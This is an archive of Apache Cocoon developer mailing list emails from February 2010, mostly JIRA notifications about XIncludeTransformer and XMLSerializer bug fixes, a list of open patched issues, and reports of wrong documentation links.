brutus.apache.org (Postfix) with ESMTP id F2122234C1EE for <[email protected]>; Mon, 8 Feb 2010 12:27:27 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 8 Feb 2010 20:27:27 +0000 (UTC) From: "Charles Yates (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (COCOON3-51) XIncludeTransformer sends extra startDocument and endDocument events In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/COCOON3-51?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12831099#action_12831099 ] Charles Yates commented on COCOON3-51: -------------------------------------- Thank you Simone, I also concluded keeping track of the document level was the best solution. > XIncludeTransformer sends extra startDocument and endDocument events > -------------------------------------------------------------------- > > Key: COCOON3-51 > URL: https://issues.apache.org/jira/browse/COCOON3-51 > Project: Cocoon 3 > Issue Type: Bug > Components: cocoon-sax > Affects Versions: 3.0.0-alpha-3 > Reporter: Charles Yates > Assignee: Simone Tripodi > Fix For: 3.0.0-alpha-3 > > Attachments: COCOON3-51.txt, patch.txt > > > The XIncludeTransformer sends extra start and endDocument events causing errors in subsequent handlers. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Mon Feb 08 20:39:50 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23089 invoked from network); 8 Feb 2010 20:39:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Feb 2010 20:39:49 -0000 Received: (qmail 81596 invoked by uid 500); 8 Feb 2010 20:39:49 -0000 Delivered-To: [email protected] Received: (qmail 81500 invoked by uid 500); 8 Feb 2010 20:39:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 81492 invoked by uid 99); 8 Feb 2010 20:39:48 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 08 Feb 2010 20:39:48 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 08 Feb 2010 20:39:48 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id EC3D4234C052 for <[email protected]>; Mon, 8 Feb 2010 12:39:27 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 8 Feb 2010 20:39:27 +0000 (UTC) From: "Simone Tripodi (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Assigned: (COCOON3-52) XMLSerializer setup method resets output method to xml In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 [ https://issues.apache.org/jira/browse/COCOON3-52?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Simone Tripodi reassigned COCOON3-52: ------------------------------------- Assignee: Simone Tripodi (was: Cocoon Developers Team) > XMLSerializer setup method resets output method to xml > ------------------------------------------------------ > > Key: COCOON3-52 > URL: https://issues.apache.org/jira/browse/COCOON3-52 > Project: Cocoon 3 > Issue Type: Bug > Components: cocoon-sax > Affects Versions: 3.0.0-alpha-3 > Reporter: Charles Yates > Assignee: Simone Tripodi > Fix For: 3.0.0-alpha-3 > > Attachments: COCOON3-52.txt > > > When checking for a null 'method' property in the format Properties object the incorrect key 'format' is used instead of 'method', returning null. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Mon Feb 08 20:39:51 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23279 invoked from network); 8 Feb 2010 20:39:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Feb 2010 20:39:50 -0000 Received: (qmail 81955 invoked by uid 500); 8 Feb 2010 20:39:49 -0000 Delivered-To: [email protected] Received: (qmail 81825 invoked by uid 500); 8 Feb 2010 20:39:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 81585 invoked by uid 99); 8 Feb 2010 20:39:49 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 08 Feb 2010 20:39:48 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 08 Feb 2010 20:39:48 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 04959234C4AD for <[email protected]>; Mon, 8 Feb 2010 12:39:28 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 8 Feb 2010 20:39:28 +0000 (UTC) From: "Simone Tripodi (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (COCOON3-52) XMLSerializer setup method resets output method to xml In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 [ https://issues.apache.org/jira/browse/COCOON3-52?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Simone Tripodi closed COCOON3-52. --------------------------------- Resolution: Fixed Fix Version/s: 3.0.0-alpha-3 Patch applied, I took advantage also to optimize String constants allocation. Thanks Charles :) > XMLSerializer setup method resets output method to xml > ------------------------------------------------------ > > Key: COCOON3-52 > URL: https://issues.apache.org/jira/browse/COCOON3-52 > Project: Cocoon 3 > Issue Type: Bug > Components: cocoon-sax > Affects Versions: 3.0.0-alpha-3 > Reporter: Charles Yates > Assignee: Simone Tripodi > Fix For: 3.0.0-alpha-3 > > Attachments: COCOON3-52.txt > > > When checking for a null 'method' property in the format Properties object the incorrect key 'format' is used instead of 'method', returning null. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Wed Feb 10 10:40:55 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10805 invoked from network); 10 Feb 2010 10:40:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Feb 2010 10:40:55 -0000 Received: (qmail 40603 invoked by uid 500); 10 Feb 2010 10:40:54 -0000 Delivered-To: [email protected] Received: (qmail 40504 invoked by uid 500); 10 Feb 2010 10:40:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 40496 invoked by uid 99); 10 Feb 2010 10:40:53 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 10 Feb 2010 10:40:53 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 10 Feb 2010 10:40:50 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 6318D234C045 for <[email protected]>; Wed, 10 Feb 2010 02:40:28 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 10 Feb 2010 10:40:28 +0000 (UTC) From: [email protected] To: [email protected] Subject: [jira] Subscription: COCOON-open-with-patch MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Issue Subscription Filter: COCOON-open-with-patch (111 issues) Subscriber: cocoon Key Summary COCOON-2278 Make SOAPHelper use https, not just http https://issues.apache.org/jira/browse/COCOON-2278 COCOON-2268 To extend the image reader we need to change the visibility to the parameter of the ImageReader https://issues.apache.org/jira/browse/COCOON-2268 COCOON-2262 container.refresh() is called before embeddedServlet.init() https://issues.apache.org/jira/browse/COCOON-2262 COCOON-2260 wrong parent version in pom of cocoon-flowscript-impl https://issues.apache.org/jira/browse/COCOON-2260 COCOON-2259 Memory leak in PoolableProxyHandler https://issues.apache.org/jira/browse/COCOON-2259 COCOON-2250 Wrong error message in Element.java (jx:element) https://issues.apache.org/jira/browse/COCOON-2250 COCOON-2249 XHTMLSerializer uses entity references &quot; and &apos; which cause JavaScript parse errors https://issues.apache.org/jira/browse/COCOON-2249 COCOON-2246 HttpRequest should handle encoding in getParameter and getParameterValues in the same way https://issues.apache.org/jira/browse/COCOON-2246 COCOON-2233 Update archetypes to current trunk artifact versions https://issues.apache.org/jira/browse/COCOON-2233 COCOON-2222 Add SaxParser configuration properties https://issues.apache.org/jira/browse/COCOON-2222 COCOON-2216 IncludeCacheManager can not perfom parallel includes https://issues.apache.org/jira/browse/COCOON-2216 COCOON-2212 jx:attribute does not check name is correct before proceeding https://issues.apache.org/jira/browse/COCOON-2212 COCOON-2197 Making the cocoon-auth-block acegi-security-sample work https://issues.apache.org/jira/browse/COCOON-2197 COCOON-2173 AbstractCachingProcessingPipeline: Two requests can deadlock each other https://issues.apache.org/jira/browse/COCOON-2173 COCOON-2162 [PATCH] Fix for Paginator when accessing out of bounds Pagination page https://issues.apache.org/jira/browse/COCOON-2162 COCOON-2137 XSD Schemas for CForms Development https://issues.apache.org/jira/browse/COCOON-2137 COCOON-2114 fix sorting in TraversableGenerator https://issues.apache.org/jira/browse/COCOON-2114 COCOON-2108 xmodule:flow-attr Does not accept document objects https://issues.apache.org/jira/browse/COCOON-2108 COCOON-2104 [PATCH] Add base URI fixup support to XIncludeTransformer https://issues.apache.org/jira/browse/COCOON-2104 COCOON-2100 Retrieving mimeType returned by pipeline executed from Flow https://issues.apache.org/jira/browse/COCOON-2100 COCOON-2041 WebDAV Returns improper status on PUT https://issues.apache.org/jira/browse/COCOON-2041 COCOON-2040 Union widget does not work with booleanfield set as case widget https://issues.apache.org/jira/browse/COCOON-2040 COCOON-2037 New DynamicGroup widget https://issues.apache.org/jira/browse/COCOON-2037 COCOON-2035 NPE in the sorter of the EnhancedRepeater https://issues.apache.org/jira/browse/COCOON-2035 COCOON-2032 [PATCH] Sort order in paginated repeater https://issues.apache.org/jira/browse/COCOON-2032 COCOON-2030 submit-on-change doesn't work for a multivaluefield with list-type="checkbox" https://issues.apache.org/jira/browse/COCOON-2030 COCOON-2018 Use thread context class loader to load custom binding classes https://issues.apache.org/jira/browse/COCOON-2018 COCOON-2017 More output beautification options for serializers https://issues.apache.org/jira/browse/COCOON-2017 COCOON-2015 Doctype added twice because root element (html) is inlined https://issues.apache.org/jira/browse/COCOON-2015 COCOON-2002 HTML transformer only works with latin-1 characters https://issues.apache.org/jira/browse/COCOON-2002 COCOON-1974 Donating ContextAttributeInputModule https://issues.apache.org/jira/browse/COCOON-1974 COCOON-1973 CaptchaValidator: allow case-insensitive matching https://issues.apache.org/jira/browse/COCOON-1973 COCOON-1964 Redirects inside a block called via the servlet protocol fail https://issues.apache.org/jira/browse/COCOON-1964 COCOON-1963 Add a redirect action to the browser update handler https://issues.apache.org/jira/browse/COCOON-1963 COCOON-1960 Pipeline errors for "generator/reader already set" should provide more information https://issues.apache.org/jira/browse/COCOON-1960 COCOON-1949 [PATCH] load flowscript from file into specified Rhino context object https://issues.apache.org/jira/browse/COCOON-1949 COCOON-1946 [PATCH] - Javaflow Sample errors trying to enhance Javaflow classes and showing cform templates https://issues.apache.org/jira/browse/COCOON-1946 COCOON-1943 [Patch] Parameters in blocks-protocol URIs get decoded too early https://issues.apache.org/jira/browse/COCOON-1943 COCOON-1932 [PATCH] correct styling of disabled suggestion lists https://issues.apache.org/jira/browse/COCOON-1932 COCOON-1929 [PATCH] Reloading classloader in Cocoon 2.2 https://issues.apache.org/jira/browse/COCOON-1929 COCOON-1917 Request Encoding problem: multipart/form vs. url encoded https://issues.apache.org/jira/browse/COCOON-1917 COCOON-1915 Nullable value with additional String or XMLizable in JavaSelectionList https://issues.apache.org/jira/browse/COCOON-1915 COCOON-1914 Text as XMLizable in EmptySelectionList https://issues.apache.org/jira/browse/COCOON-1914 COCOON-1899 [PATCH] Cocoon XML:DB Implementation should not depend on Xindice https://issues.apache.org/jira/browse/COCOON-1899 COCOON-1898 [PATCH] XPatch support for maven-cocoon-deployer-plugin https://issues.apache.org/jira/browse/COCOON-1898 COCOON-1893 XML-Binding: Problem creating a new element https://issues.apache.org/jira/browse/COCOON-1893 COCOON-1877 [PATCH] Pageable Repeater https://issues.apache.org/jira/browse/COCOON-1877 COCOON-1870 Lucene block does not store attributes when instructed so https://issues.apache.org/jira/browse/COCOON-1870 COCOON-1846 [PATCH] BooleanField and radio do not send on-value-changed at the rigth time with IE https://issues.apache.org/jira/browse/COCOON-1846 COCOON-1843 LDAPTransformer: add-entry tag doesn't work https://issues.apache.org/jira/browse/COCOON-1843 COCOON-1842 LDAPTransformer: ClassCastException with Binary fields https://issues.apache.org/jira/browse/COCOON-1842 COCOON-1810 [PATCH] JMSEventMessageListener does not work https://issues.apache.org/jira/browse/COCOON-1810 COCOON-1807 Workaround for IE Bug in <button> https://issues.apache.org/jira/browse/COCOON-1807 COCOON-1794 [PATCH] Propagation of namespaces to a repeaters child bindings and implementation of a move-node binding https://issues.apache.org/jira/browse/COCOON-1794 COCOON-1738 double-listbox problem in repeaters https://issues.apache.org/jira/browse/COCOON-1738 COCOON-1726 Implementation of Source that supports conditional GETs https://issues.apache.org/jira/browse/COCOON-1726 COCOON-1717 Use custom cache keys for caching uri coplets using input modules. https://issues.apache.org/jira/browse/COCOON-1717 COCOON-1697 Allow request parameters to be used in "for (var k in h)" kind of Javascript Loops https://issues.apache.org/jira/browse/COCOON-1697 COCOON-1648 Add support for ISO8601 in I18nTransformer and Forms https://issues.apache.org/jira/browse/COCOON-1648 COCOON-1618 [PATCH] SoapGenerator/Serializer for Axis Block https://issues.apache.org/jira/browse/COCOON-1618 COCOON-1611 [PATCH] Add additonal constructor to FormInstance.java to be able to pass a locale https://issues.apache.org/jira/browse/COCOON-1611 COCOON-1603 [PATCH] handling of alternatives in MailTransformer https://issues.apache.org/jira/browse/COCOON-1603 COCOON-1573 Improvement SetAttributeJXPathBinding and Contribution SetNodeValueJXPathBinding https://issues.apache.org/jira/browse/COCOON-1573 COCOON-1556 [PATCH] Add a JXPathConvertor for conversion betwean beans and Strings https://issues.apache.org/jira/browse/COCOON-1556 COCOON-1535 [PATCH] enhancement to {global:} input module: return all sitemap globals https://issues.apache.org/jira/browse/COCOON-1535 COCOON-1527 [PATCH] Cache control logic sheets for XSP to override getKey and getValidity https://issues.apache.org/jira/browse/COCOON-1527 COCOON-1526 [PATCH] processToDOM returns a read-only DOM https://issues.apache.org/jira/browse/COCOON-1526 COCOON-1519 [PATCH] TeeTransformer refactoring https://issues.apache.org/jira/browse/COCOON-1519 COCOON-1508 [PATCH] Avalonize TranscoderFactory https://issues.apache.org/jira/browse/COCOON-1508 COCOON-1506 [PATCH] Manually specifying a mounted sitemap's context https://issues.apache.org/jira/browse/COCOON-1506 COCOON-1488 [PATCH] htmlunit-based testing, needs to be ported to 2.2 https://issues.apache.org/jira/browse/COCOON-1488 COCOON-1467 ESQL exception handling problem https://issues.apache.org/jira/browse/COCOON-1467 COCOON-1439 [poi] vertical text orientation and font cache https://issues.apache.org/jira/browse/COCOON-1439 COCOON-1398 New CachingPortletAdapter https://issues.apache.org/jira/browse/COCOON-1398 COCOON-1395 [PATCH] Missing ContextAttributeInputModule https://issues.apache.org/jira/browse/COCOON-1395 COCOON-1394 [PATCH] Implementation of PortletRequest#getQueryString() https://issues.apache.org/jira/browse/COCOON-1394 COCOON-1384 [PATCH] flow redirector should allow explicit 'cocoon:' scheme https://issues.apache.org/jira/browse/COCOON-1384 COCOON-1370 [PATCH] proxy block can now use JTidy and handle multipart POST https://issues.apache.org/jira/browse/COCOON-1370 COCOON-1368 [PATCH] HTTPRequestTransformer https://issues.apache.org/jira/browse/COCOON-1368 COCOON-1362 [PATCH] log4j.xconf should have the same default config as logkit.xconf https://issues.apache.org/jira/browse/COCOON-1362 COCOON-1360 [patch] client side validation for CForms https://issues.apache.org/jira/browse/COCOON-1360 COCOON-1345 [PATCH] Extract convertors into their own block https://issues.apache.org/jira/browse/COCOON-1345 COCOON-1340 [PATCH] lucene block contribution : a AnalyzerManager component https://issues.apache.org/jira/browse/COCOON-1340 COCOON-1337 [PATCH] Suggestion for widget population https://issues.apache.org/jira/browse/COCOON-1337 COCOON-1336 [PATCH] PortletWindowAspect: hiding portlet mode icons and new feature "force-sizable" https://issues.apache.org/jira/browse/COCOON-1336 COCOON-1332 [PATCH] content-length and content-type for portlet ActionRequest https://issues.apache.org/jira/browse/COCOON-1332 COCOON-1329 [PATCH] Fix for cocoon.jar bundled in ear common for portal.war and portlet.war https://issues.apache.org/jira/browse/COCOON-1329 COCOON-1325 [PATCH] commons-fileupload based multipart parser https://issues.apache.org/jira/browse/COCOON-1325 COCOON-1302 [Patch] Word Document Generator https://issues.apache.org/jira/browse/COCOON-1302 COCOON-1295 ParallelContentAggregator, multithreaded aggregating https://issues.apache.org/jira/browse/COCOON-1295 COCOON-1260 [PATCH] MultipartParser can now handle multipart/mixed https://issues.apache.org/jira/browse/COCOON-1260 COCOON-1254 [Patch] OWQLTransformer + RDQLTransformer https://issues.apache.org/jira/browse/COCOON-1254 COCOON-1249 [Patch] XMLDBSource should accept scheme://user:pass@host:port/path URIs https://issues.apache.org/jira/browse/COCOON-1249 COCOON-1232 [PATCH] NEW--ModuleDB Action for ORACLE( auto. increment ) https://issues.apache.org/jira/browse/COCOON-1232 COCOON-1203 [PATCH] inserver junit testing https://issues.apache.org/jira/browse/COCOON-1203 COCOON-1200 [PATCH] XML CSS engine https://issues.apache.org/jira/browse/COCOON-1200 COCOON-1185 [PATCH] BerkeleyDBStore https://issues.apache.org/jira/browse/COCOON-1185 COCOON-1147 [PATCH] namespace issues with XMLDBTransformer https://issues.apache.org/jira/browse/COCOON-1147 COCOON-1125 [PATCH] Updated CastorTransformer + samples https://issues.apache.org/jira/browse/COCOON-1125 COCOON-1027 [PATCH] CocoonBean add additional features for reprocessing pipelines and interrupt processing https://issues.apache.org/jira/browse/COCOON-1027 COCOON-996 [PATCH] LuceneIndexContentHandler.java produces CLOBs https://issues.apache.org/jira/browse/COCOON-996 COCOON-988 [PATCH] StreamGenerator can't handle multipart request parameters correctly https://issues.apache.org/jira/browse/COCOON-988 COCOON-881 [PATCH] file upload component for usage with flowscript https://issues.apache.org/jira/browse/COCOON-881 COCOON-871 [PATCH] XML posting from SourceWritingTransformer by using an enhanced HTTPClientSource https://issues.apache.org/jira/browse/COCOON-871 COCOON-867 [PATCH] wsinclude and htmlinclude transformers https://issues.apache.org/jira/browse/COCOON-867 COCOON-865 [PATCH] New ResourceLoadAction https://issues.apache.org/jira/browse/COCOON-865 COCOON-844 [PATCH] adding <wd:on-phase> and moving load() and save() to Form. https://issues.apache.org/jira/browse/COCOON-844 COCOON-825 [PATCH] Fix Bug: Better handling of CLOB in esql (get-xml) and handling of Oracle 'temporary lobs' https://issues.apache.org/jira/browse/COCOON-825 COCOON-719 [PATCH] Support for transactions in SQLTransformer https://issues.apache.org/jira/browse/COCOON-719 COCOON-717 [PATCH] Namespace cleanup in HTMLSerializer https://issues.apache.org/jira/browse/COCOON-717 COCOON-665 [PATCH] HSSFSerializer Support for FreezePane https://issues.apache.org/jira/browse/COCOON-665 You may edit this subscription at: https://issues.apache.org/jira/secure/FilterSubscription!default.jspa?subId=10311&filterId=12310771 From [email protected] Mon Feb 15 18:09:58 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51076 invoked from network); 15 Feb 2010 18:09:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Feb 2010 18:09:58 -0000 Received: (qmail 4293 invoked by uid 500); 15 Feb 2010 09:09:58 -0000 Delivered-To: [email protected] Received: (qmail 4210 invoked by uid 500); 15 Feb 2010 09:09:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 4202 invoked by uid 99); 15 Feb 2010 09:09:58 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Feb 2010 09:09:58 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Feb 2010 09:09:48 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id DB4F4234C1EE for <[email protected]>; Mon, 15 Feb 2010 01:09:27 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 15 Feb 2010 09:09:27 +0000 (UTC) From: =?utf-8?Q?Andreas_Kr=C3=BCger_=28JIRA=29?= <[email protected]> To: [email protected] Subject: [jira] Created: (COCOON-2281) "Communication tools that we use" link to dev mailing list archive comes out at user mailing list archive MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 "Communication tools that we use" link to dev mailing list archive comes ou= t at user mailing list archive ---------------------------------------------------------------------------= ------------------------------ Key: COCOON-2281 URL: https://issues.apache.org/jira/browse/COCOON-2281 Project: Cocoon Issue Type: Task Components: - Documentation Reporter: Andreas Kr=C3=BCger Priority: Minor Point your browser to http://cocoon.apache.org/1275_1_1.html . Go down to the section "Developer List", then lower to "Archive". Find the link advertised as "http://[email protected].= org/ (since July 2003)". Click. Expected: Your browser goes to the dev mailing list archive. Seen: Your browser goes to the user mailing list archive instead. The (before July 2003) - link is even worse: It both advertises and goes to= the user list. --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Mon Feb 15 18:11:59 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 55067 invoked from network); 15 Feb 2010 18:11:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Feb 2010 18:11:59 -0000 Received: (qmail 8416 invoked by uid 500); 15 Feb 2010 09:11:58 -0000 Delivered-To: [email protected] Received: (qmail 8325 invoked by uid 500); 15 Feb 2010 09:11:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 8316 invoked by uid 99); 15 Feb 2010 09:11:58 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Feb 2010 09:11:58 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Feb 2010 09:11:48 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 8D50B234C1EE for <[email protected]>; Mon, 15 Feb 2010 01:11:28 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 15 Feb 2010 09:11:28 +0000 (UTC) From: =?utf-8?Q?Andreas_Kr=C3=BCger_=28JIRA=29?= <[email protected]> To: [email protected] Subject: [jira] Updated: (COCOON-2281) "Communication tools that we use" link to dev mailing list archive comes out at user mailing list archive In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 [ https://issues.apache.org/jira/browse/COCOON-2281?page=3Dcom.atlassi= an.jira.plugin.system.issuetabpanels:all-tabpanel ] Andreas Kr=C3=BCger updated COCOON-2281: ----------------------------------- Attachment: fix-dev-user-link-confusion.patch Apply to the source of http://cocoon.apache.org/1275_1_1.html . > "Communication tools that we use" link to dev mailing list archive comes = out at user mailing list archive > -------------------------------------------------------------------------= -------------------------------- > > Key: COCOON-2281 > URL: https://issues.apache.org/jira/browse/COCOON-2281 > Project: Cocoon > Issue Type: Task > Components: - Documentation > Reporter: Andreas Kr=C3=BCger > Priority: Minor > Attachments: fix-dev-user-link-confusion.patch > > > Point your browser to http://cocoon.apache.org/1275_1_1.html . > Go down to the section "Developer List", then lower to "Archive". > Find the link advertised as "http://[email protected]= e.org/ (since July 2003)". Click. > Expected: Your browser goes to the dev mailing list archive. > Seen: Your browser goes to the user mailing list archive instead. > The (before July 2003) - link is even worse: It both advertises and goes = to the user list. --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Mon Feb 15 19:54:32 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95944 invoked from network); 15 Feb 2010 19:54:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Feb 2010 19:54:32 -0000 Received: (qmail 81003 invoked by uid 500); 15 Feb 2010 08:47:52 -0000 Delivered-To: [email protected] Received: (qmail 80914 invoked by uid 500); 15 Feb 2010 08:47:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 80906 invoked by uid 99); 15 Feb 2010 08:47:51 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Feb 2010 08:47:51 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Feb 2010 08:47:49 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id E2F81234C1EE for <[email protected]>; Mon, 15 Feb 2010 00:47:27 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 15 Feb 2010 08:47:27 +0000 (UTC) From: =?utf-8?Q?Andreas_Kr=C3=BCger_=28JIRA=29?= <[email protected]> To: [email protected] Subject: [jira] Created: (COCOON-2279) http://www.apache.org/dist/cocoon/ an mirrors still list 2.1.11 as latest Cocoon release - needs update. MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org http://www.apache.org/dist/cocoon/ an mirrors still list 2.1.11 as latest C= ocoon release - needs update. ---------------------------------------------------------------------------= ----------------------------- Key: COCOON-2279 URL: https://issues.apache.org/jira/browse/COCOON-2279 Project: Cocoon Issue Type: Task Components: - Documentation Reporter: Andreas Kr=C3=BCger Priority: Minor Point your browser to http://www.apache.org/dist/cocoon/ .=20 Is: Second paragraph starts with > The latest release of Apache Cocoon is 2.1.11. Should: > The latest release of Apache Cocoon is 2.2.0. The rest of that paragraph should probably be reviewed, too. Regards, and thank you for providing fine software, Andreas --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Mon Feb 15 19:56:31 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 98174 invoked from network); 15 Feb 2010 19:56:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Feb 2010 19:56:31 -0000 Received: (qmail 85320 invoked by uid 500); 15 Feb 2010 08:49:51 -0000 Delivered-To: [email protected] Received: (qmail 85226 invoked by uid 500); 15 Feb 2010 08:49:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 85218 invoked by uid 99); 15 Feb 2010 08:49:51 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Feb 2010 08:49:51 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 